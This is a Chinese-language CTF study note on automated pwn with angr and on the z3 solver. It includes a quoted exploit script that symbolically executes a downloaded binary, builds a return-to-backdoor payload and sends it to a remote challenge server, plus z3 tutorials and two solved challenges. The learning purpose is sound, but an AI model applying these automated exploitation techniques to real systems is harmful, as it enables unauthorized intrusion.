v3073 ^= 0xAFu;
v3075 ^= 0x99u;
v3076 ^= 0xF5u;
v3077 ^= 0xDu;
v3074 ^= 0xE6u;
fksth(v3072, "MqEJKIdJeQbMxeUNT");
}

其中char v3072[3]; // [rsp+1420h] [rbp-20h] BYREF

程序有设置alarm,那么关键就是如何短时间完成挑战了,也就是自动化pwn的套路,根据前面做的那些题的总结,自己有一个思路是按照纵横杯那题一样,通过检测最后是否会调用input时参数第一个参数为rbp-20h,但不大确定这个变量是不是固定在这个位置,应当是不固定的

看一下出题人给出的wp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
from pwn import *
import angr
import claripy
import base64
def pass_proof(target, part):
pass

r = remote("123.60.82.85", 1447)
r.recvline()
r.recvline()
r.recvline()
proof = r.recvline().decode("ASCII")
ppp = pass_proof(proof[proof.find("== ") + 3: -2], proof[len("sha256(xxxx + "): proof.find(") == ")])
r.sendlineafter(b"give me xxxx:", ppp.encode("ASCII"))
r.recvline()
bin_data = base64.b64decode(r.recvline().decode("ASCII"))
###########################################################################################################
open("a.out", "wb").write(bin_data)
ret_rop = bin_data.find(b'\xc3', 0x1000) + 0x400000
print("ret_rop:", hex(ret_rop))

p = angr.Project("./a.out")

def getBVV(state, sizeInBytes, type = 'str'):
global pathConditions
name = 's_' + str(state.globals['symbols_count'])
bvs = claripy.BVS(name, sizeInBytes * 8)
state.globals['symbols_count'] += 1
state.globals[name] = (bvs, type)
return bvs

def angr_load_str(state, addr):
s, i = '', 0
while True:
ch = state.solver.eval(state.memory.load(addr + i, 1))
if ch == 0: break
s += chr(ch)
i += 1
return s

class ReplacementCheckEquals(angr.SimProcedure):
def run(self, str1, str2):
cmp1 = angr_load_str(self.state, str2).encode("ascii")
cmp0 = self.state.memory.load(str1, len(cmp1))
self.state.regs.rax = claripy.If(cmp1 == cmp0, claripy.BVV(0, 32), claripy.BVV(1, 32))

class ReplacementCheckInput(angr.SimProcedure):
def run(self, buf, len):
len = self.state.solver.eval(len)
self.state.memory.store(buf, getBVV(self.state, len))

class ReplacementInputVal(angr.SimProcedure):
def run(self):
self.state.regs.rax = getBVV(self.state, 4, 'int')

class ReplacementInit(angr.SimProcedure):
def run(self):
return

p.hook_symbol("_Z5fksthPKcS0_", ReplacementCheckEquals())
p.hook_symbol("_Z10input_linePcm", ReplacementCheckInput())
p.hook_symbol("_Z9input_valv", ReplacementInputVal())
p.hook_symbol("_Z4initv", ReplacementInit())
enter = p.factory.entry_state()
enter.globals['symbols_count'] = 0
simgr = p.factory.simgr(enter, save_unconstrained=True)
d = simgr.explore()
backdoor = p.loader.find_symbol('_Z8backdoorv').rebased_addr
for state in d.unconstrained:
bindata = b''
rsp = state.regs.rsp
next_stack = state.memory.load(rsp, 8, endness=p.arch.memory_endness)
state.add_constraints(state.regs.rip == ret_rop)
state.add_constraints(next_stack == backdoor)
for i in range(state.globals['symbols_count']):
s, s_type = state.globals['s_' + str(i)]
if s_type == 'str':
bb = state.solver.eval(s, cast_to=bytes)
if bb.count(b'\x00') == len(bb):
bb = b'A' * bb.count(b'\x00')
bindata += bb
elif s_type == 'int':
bindata += str(state.solver.eval(s, cast_to=int)).encode('ASCII') + b' '
print(bindata)
r.send(bindata)
r.interactive()
break

首先是一些预操作,接着是对四个函数进行hook,防止路径爆炸或其他?

获得unconstrained,然后这个乍一看怪怪的

1
2
for i in range(state.globals['symbols_count']):
s, s_type = state.globals['s_' + str(i)]

这里了解一个知识

state.globals.__dict__是一个字典,里面又有一个字典_backer

1
2
>>> d.unconstrained[0].globals.__dict__
{'state': None, '_backer': {'symbols_count': 17, 's_0': (<BV32 s_0_51_32>, 'int'), 's_1': (<BV32 s_1_52_32>, 'int'), 's_2': (<BV32 s_2_53_32>, 'int'), 's_3': (<BV32 s_3_54_32>, 'int'), 's_4': (<BV32 s_4_56_32>, 'int'), 's_5': (<BV32 s_5_57_32>, 'int'), 's_6': (<BV32 s_6_58_32>, 'int'), 's_7': (<BV32 s_7_59_32>, 'int'), 's_8': (<BV392 s_8_64_392>, 'str'), 's_9': (<BV32 s_9_74_32>, 'int'), 's_10': (<BV32 s_10_80_32>, 'int'), 's_11': (<BV32 s_11_85_32>, 'int'), 's_12': (<BV32 s_12_92_32>, 'int'), 's_13': (<BV248 s_13_116_248>, 'str'), 's_14': (<BV296 s_14_160_296>, 'str'), 's_15': (<BV448 s_15_230_448>, 'str'), 's_16': (<BV464 s_16_379_464>, 'str')}}

里面有着symbols_count对应着全部的键值对数量

以及这样的键值对s_num:(var,type),代表的是从初始状态到该状态所有出现的符号,num代表的是出现的顺序

那么wp就明朗了没啥好说的,将符号转为字节串payload就是了

约束求解

约束求解用于解决一组条件的问题,这些条件通常被称为约束,其目的是找到满足这些约束的变量值。

在程序分析中,约束求解通常与符号执行相结合使用。符号执行是一种用符号变量代替具体值的执行技术,它可以在不实际执行程序的情况下探索程序路径,并生成关于程序行为的约束。约束求解器则负责解决这些约束,以确定符号变量可能的取值,从而确定程序执行的路径或找到输入数据的有效值。

约束求解在以下情况下特别有用:

  1. 程序分析:通过符号执行和约束求解,可以发现程序中的漏洞、逻辑错误或安全问题。
  2. 自动化测试:使用符号执行和约束求解来生成输入数据,以覆盖代码中的不同执行路径,从而进行自动化测试。
  3. 逆向工程:在逆向工程中,约束求解可以帮助分析者理解程序的行为,并识别关键的代码路径。
  4. 二进制分析:在分析二进制文件时,约束求解可以帮助分析者理解程序逻辑,并发现关键功能。

约束求解器的实现通常涉及各种技术和算法,包括基于SAT(可满足性问题)的方法、基于SMT(可满足性模理论)的方法以及其他启发式和优化算法。

下面介绍一下微软开发的z3约束求解器

z3

z3是一个十分强大的约束求解器,支持众多功能

类型变量

z3中有3中类型的变量,分别是整型(Int),实型(Real)和向量(BitVec)

Int-整数型

1
2
3
from z3 import *
a = Int('a')#声明单个整型变量
a,b = Ints('a b')#声明多个整型变量

Real-实数型

1
2
3
from z3 import *
a = Real('a')#声明单个实型变量
a,b = Reals('a b')#声明多个实型变量

BitVec-向量

1
2
3
from z3 import *
a = BitVec('a',8) #声明单个8位的变量
a, b = BitVec('a b',8)#声明多个8位的变量

基础使用

0x1简单约束求解

1
2
3
4
>>> from z3 import *
>>> a,b = Ints('a b')
>>> solve(a>6,b<10,a*b-1==48)
[a = 49, b = 1]

0x2多条件条件约束器

1
2
3
4
5
6
7
8
9
10
11
12
from z3 import *
a,b = Ints('a b')
solver = Solver()#创建一个求解器对象
solver.add(a+b==10)#用add方法添加约束条件
solver.add(a-b==6)
if solver.check() == sat: #check()方法用来判断是否有解,sat(satisify)表示满足有解
ans = solver.model() #model()方法得到解
print(ans)
#也可以用变量名作为下标得到解
print(ans[a])
else:
print("no ans!")

0x3表达式简化

1
2
3
4
5
6
from z3 import *
x=Int('x')
y=Int('y')
print (simplify(x + y + 2*x + 3))
print (simplify(x < y + x + 2))
print (simplify(And(x + 1 >= 3, x**2 + x**2 + y**2 + 2 >= 5)))

输出:

1
2
3
3 + 3*x + y
Not(y <= -2)
And(x >= 2, 2*x**2 + y**2 >= 3)

0x4表达式分析

1
2
3
4
5
6
7
8
9
10
from z3 import *
x = Int('x')
y = Int('y')
n = x + y >= 3
print ("num args: ", n.num_args())
print ("children: ", n.children())
print ("1st child:", n.arg(0))
print ("2nd child:", n.arg(1))
print ("operator: ", n.decl())
print ("op name: ", n.decl().name())

输出

1
2
3
4
5
6
num args:  2
children: [x + y, 3]
1st child: x + y
2nd child: 3
operator: >=
op name: >=

特性

z3只适用于求解非线性多项式

像这样的就无法求解

1
2
3
4
5
x = Real('x')
>>> s = Solver()
>>> s.add(2**x == 3)
>>> print (s.check())
unknown

例题

2020De1ta-code_runner

这题一开始有一个sha256爆破,之后才能拿到二进制文件,这里直接从二进制文件分析开始

这是个mipsel架构的文件

main函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
// local variable allocation has failed, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
__int64 v3; // $a0 OVERLAPPED
__int64 v4; // $a2 OVERLAPPED
__int64 v6; // [sp+28h] [+28h]
struct timeval v7; // [sp+3Ch] [+3Ch] BYREF
struct timeval v8; // [sp+44h] [+44h] BYREF
void (__fastcall *v9[64])(_DWORD, _DWORD, _DWORD, _DWORD); // [sp+4Ch] [+4Ch] BYREF

gettimeofday(&v7, 0);
memset(v9, 0, sizeof(v9));
sub_401BA4();
if ( sub_401C6C() )
{
gettimeofday(&v8, 0);
v6 = (unsigned int)(1000000 * (v8.tv_sec - v7.tv_sec) + v8.tv_usec - v7.tv_usec);
printf("======== %lld.%llds ========\n", v6 / 1000000, v6 % 1000000);
sub_401D48(v6, 0);
puts("Your time comes.\n> ");
if ( (unsigned __int64)(v6 / 100000) < 0xD )
read(0, v9, -4 * (v6 / 100000) + 52);
v9[0](v3, HIDWORD(v3), v4, HIDWORD(v4));
}
return 0;
}

在最后可以执行shellcode,观察到前面的时间计算,显然是限制需要在一定时间内完成某些挑战

在sub_401C6C()函数里有一大坨套娃函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int sub_401C6C()
{
char v1[256]; // [sp+1Ch] [+1Ch] BYREF

memset(v1, 0, sizeof(v1));
puts("Faster > ");
read(0, v1, 0x100u);
return sub_401A9C((int)v1);
}
....
....
int sub_400B30()
{
return 3221338814;
}

最终需要满足各种条件到达sub_400B30()

序会先读取0x100的输入,然后对这个输入做一系列的验证,只有通过所有验证函数才可以返回一个非零值。这些验证函数,每一个函数处理4字节的输入,然后如果此4字节通过验证,会调用另一个函数再去处理接下来的4字节;如果此4字节没有通过验证,则直接返回0。这种模式我们称之为线性,也就是说一旦有4字节的输入不正确,接下来的所有输入都不会被验证。

线性模式的解题利器就是angr,一段不做任何优化处理的脚本可以是

1
2
3
4
5
6
p = angr.Project("real_code")
state = p.factory.blank_state(addr=0x401e88)
sm = p.factory.simgr(state)
sm.explore(find=0x400b30)
# 0x400b30为最内层return非零值的汇编指令
print(sm.found[0].posix.dumps(0))

之后好像有点复杂,先摸了

DEFCAMP2017-forgot_my_key

给了这么一个加密函数

1
2
3
4
5
6
7
8
9
10
11
function my_encrypt($flag, $key) {
$key = md5($key);
$message = $flag . "|" . $key;

$encrypted = chr(rand(0, 126));
for($i=0;$i<strlen($message);$i++) {
$encrypted .= chr((ord($message[$i]) + ord($key[$i % strlen($key)]) + ord($encrypted[$i])) % 126);
}
$hexstr = unpack('h*', $encrypted);
return array_shift($hexstr);
}

加密串每一位都与明文、key、和加密串的前一位相关。但是由于第一位是随机出来的,所以很难从开头递推出来。

但是细心观察 message 的构成又可以发现,后面 32 位是 key 的 md5 串,倒数第 33 位又是已知,因此从这里就可以打开突破口。整理思路如下:

  • 第一步:通过倒数第 33 位明文已知,且密文已知,因此可以求得某一位 md5($key) 的值。
  • 第二步:根据上一步推出来的值,又可以进一步推另一位 message 的值。如此往复下去,最终应该能找到所有的值。

首先题目肯定保证了答案的唯一性,因此 Z3 求解成功就会得到 flag 无疑

其次,我们根据题目的变换方式,给 Z3 所有的正推关系式,把逆推的逻辑让 Z3 通过约束求解来完成,由于逆推可以一步步进行,因此也不会导致 Z3 复杂度爆炸求解不出来

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/usr/bin/env python3

from z3 import *
import binascii

s = '5616f5962674d26741d2810600a6c5647620c4e3d2870177f09716b2379012c342d3b584c5672195d653722443f1c39254360007010381b721c741a532b03504d2849382d375c0d6806251a2946335a67365020100f160f17640c6a05583f49645d3b557856221b2'

encrypted = []
for i in range(0, len(s), 2):
encrypted.append(binascii.unhexlify(s[i+1] + s[i])[0])

print('message len:', len(encrypted)-1)
print(encrypted)
# 声明变量,encrypted 是已知,因此 IntVal 即可
encrypted = [IntVal(i) for i in encrypted]
message = [Int('flag%d' % i) for i in range(len(encrypted)-1)]
# 创建一个求解器,求解全靠它
solver = Solver()

ml = len(encrypted) - 1

# 添加明文字符的约束条件
for i in range(ml):
if i == ml - 33:
solver.add(message[i] == ord('|'))
else:
# 肯定是可见字符,因此限定范围如下
solver.add(message[i] < 127)
solver.add(message[i] >= 32)
# 添加明文和密文对照关系的约束条件
for i in range(ml):
solver.add(encrypted[i+1] == (message[i] + message[ml-32+i%32] + encrypted[i]) % 126)

if solver.check() == sat:
m = solver.model()
s = []
for i in range(ml):
s.append(m[message[i]].as_long())
print(bytes(s))
else:
print('unsat')